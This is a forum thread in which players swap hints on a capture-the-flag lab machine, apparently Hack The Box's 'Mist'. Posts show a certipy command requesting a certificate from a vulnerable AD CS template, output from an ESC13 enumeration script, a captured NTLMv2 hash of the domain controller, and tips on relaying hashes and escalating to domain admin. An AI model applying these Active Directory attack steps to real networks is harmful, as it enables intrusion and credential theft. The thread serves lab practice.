Posts: 231
Threads: 18
Joined: Jul 2023
dm please we can reach the goal together
Posts: 231
Threads: 18
Joined: Jul 2023
Apr 06, 2024, 07:27 AM
(This post was last modified: Apr 06, 2024, 07:57 AM by cavour13.)
read the github page better! auth it's your friend but are you able to generate administrator .pfx?????
for everyone who ask me things like sharon.. i can't write pm till tomorrow! 1st time i reach my limit/day ...
feel free to pm with your discord and your actual situation
Posts: 13
Threads: 0
Joined: Apr 2024
(Apr 06, 2024, 07:05 AM)ByteBuster Wrote: I'm not very clear on this... we are supposed to be able to enroll the template and get the permissions of the group? OID
certipy req -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -target "$ADCS_HOST" -ca 'ca_name' -template 'Vulnerable template'
But how can we use the generated certificate svc_cabackup.pfx or I don't know if there is any trick in how to get the certificate correctly
Has anyone tried this shit with powershell 
https://posts.specterops.io/adcs-esc13-a...a4272fbd53 Check-ADCSESC13.ps1 output:
*Evil-WinRM* PS C:\Users\op_Sharon.Mullard\Documents> ./Check-ADCSESC13.ps1
Enumerating OIDs
------------------------
OID 14514029.01A0D91BA39F2716F6917FF97B18C130 links to group: CN=Certificate Managers,CN=Users,DC=mist,DC=htb
OID DisplayName: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.6538420.14514029
OID DistinguishedName: CN=14514029.01A0D91BA39F2716F6917FF97B18C130,CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,DC=mist,DC=htb
OID msPKI-Cert-Template-OID: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.6538420.14514029
OID msDS-OIDToGroupLink: CN=Certificate Managers,CN=Users,DC=mist,DC=htb
------------------------
OID 979197.E044723721C6681BECDB4DDD43B151CC links to group: CN=ServiceAccounts,OU=Services,DC=mist,DC=htb
OID DisplayName: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.858803.979197
OID DistinguishedName: CN=979197.E044723721C6681BECDB4DDD43B151CC,CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,DC=mist,DC=htb
OID msPKI-Cert-Template-OID: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.858803.979197
OID msDS-OIDToGroupLink: CN=ServiceAccounts,OU=Services,DC=mist,DC=htb
------------------------
Enumerating certificate templates
------------------------
Certificate template ManagerAuthentication may be used to obtain membership of CN=Certificate Managers,CN=Users,DC=mist,DC=htb
Certificate template Name: ManagerAuthentication
OID DisplayName: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.6538420.14514029
OID DistinguishedName: CN=14514029.01A0D91BA39F2716F6917FF97B18C130,CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,DC=mist,DC=htb
OID msPKI-Cert-Template-OID: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.6538420.14514029
OID msDS-OIDToGroupLink: CN=Certificate Managers,CN=Users,DC=mist,DC=htb
------------------------
Certificate template BackupSvcAuthentication may be used to obtain membership of CN=ServiceAccounts,OU=Services,DC=mist,DC=htb
Certificate template Name: BackupSvcAuthentication
OID DisplayName: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.858803.979197
OID DistinguishedName: CN=979197.E044723721C6681BECDB4DDD43B151CC,CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,DC=mist,DC=htb
OID msPKI-Cert-Template-OID: 1.3.6.1.4.1.311.21.8.5839708.6945465.11485352.4768789.12323346.226.858803.979197
OID msDS-OIDToGroupLink: CN=ServiceAccounts,OU=Services,DC=mist,DC=htb
------------------------
Posts: 13
Threads: 0
Joined: Apr 2024
ADCS ESC13 is the way to get root.
Posts: 12
Threads: 0
Joined: Apr 2024
(Apr 05, 2024, 03:01 PM)manamana Wrote: I still use ligolo-ng failed, any hits ?
follow that instruction its work for me if tell them where are you faccing issue and what error are came
Posts: 4
Threads: 0
Joined: Nov 2023
[SMB] NTLMv2-SSP Client : 10.10.11.17
[SMB] NTLMv2-SSP Username : MIST\DC01$
[SMB] NTLMv2-SSP Hash : DC01$::MIST:5ebacbd98eda8691:8F4262203620F98220DC9EC77A5C444F:0101000000000000800FA8DB4B88DA01479F6D165F877DF10000000002000800330046004D004E0001001E00570049004E002D004C005800490057004C0030003100500037004E00390004003400570049004E002D004C005800490057004C0030003100500037004E0039002E00330046004D004E002E004C004F00430041004C0003001400330046004D004E002E004C004F00430041004C0005001400330046004D004E002E004C004F00430041004C0007000800800FA8DB4B88DA010600040002000000080030003000000000000000000000000040000074AC1971E9C305C79707532C28339F469F9F0940DC8B723FA33C06EEB74E85660A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00330032000000000000000000
what to do with this
Posts: 3
Threads: 0
Joined: Apr 2024
Damn I'm so close now. just need a final nudge
How can I use the ticket with special permissions on the DC?
SMB doesnt like it. i can't pass it. no other services give me a shell...
Posts: 43
Threads: 1
Joined: Oct 2023
(Apr 06, 2024, 12:29 PM)gren Wrote: [SMB] NTLMv2-SSP Client : 10.10.11.17
[SMB] NTLMv2-SSP Username : MIST\DC01$
[SMB] NTLMv2-SSP Hash : DC01$::MIST:5ebacbd98eda8691:8F4262203620F98220DC9EC77A5C444F:0101000000000000800FA8DB4B88DA01479F6D165F877DF10000000002000800330046004D004E0001001E00570049004E002D004C005800490057004C0030003100500037004E00390004003400570049004E002D004C005800490057004C0030003100500037004E0039002E00330046004D004E002E004C004F00430041004C0003001400330046004D004E002E004C004F00430041004C0005001400330046004D004E002E004C004F00430041004C0007000800800FA8DB4B88DA010600040002000000080030003000000000000000000000000040000074AC1971E9C305C79707532C28339F469F9F0940DC8B723FA33C06EEB74E85660A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00330032000000000000000000
what to do with this
this hash is uncrackable, you cannot get DC01 NT hash or password from it
Posts: 5
Threads: 0
Joined: Mar 2024
(Apr 06, 2024, 01:43 PM)Steward Wrote: (Apr 06, 2024, 12:29 PM)gren Wrote: [SMB] NTLMv2-SSP Client : 10.10.11.17
[SMB] NTLMv2-SSP Username : MIST\DC01$
[SMB] NTLMv2-SSP Hash : DC01$::MIST:5ebacbd98eda8691:8F4262203620F98220DC9EC77A5C444F:0101000000000000800FA8DB4B88DA01479F6D165F877DF10000000002000800330046004D004E0001001E00570049004E002D004C005800490057004C0030003100500037004E00390004003400570049004E002D004C005800490057004C0030003100500037004E0039002E00330046004D004E002E004C004F00430041004C0003001400330046004D004E002E004C004F00430041004C0005001400330046004D004E002E004C004F00430041004C0007000800800FA8DB4B88DA010600040002000000080030003000000000000000000000000040000074AC1971E9C305C79707532C28339F469F9F0940DC8B723FA33C06EEB74E85660A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00330032000000000000000000
what to do with this
this hash is uncrackable, you cannot get DC01 NT hash or password from it
I'm not there yet, but you can replay NTLMv2 hashes if you can't crack them. If that's any help
Posts: 3
Threads: 0
Joined: Apr 2024
(Apr 06, 2024, 01:30 PM)sharonmalone Wrote: Damn I'm so close now. just need a final nudge
How can I use the ticket with special permissions on the DC?
SMB doesnt like it. i can't pass it. no other services give me a shell...
omg what a slog!
over all it was a great challenge
dm if you want hints. not long left
|
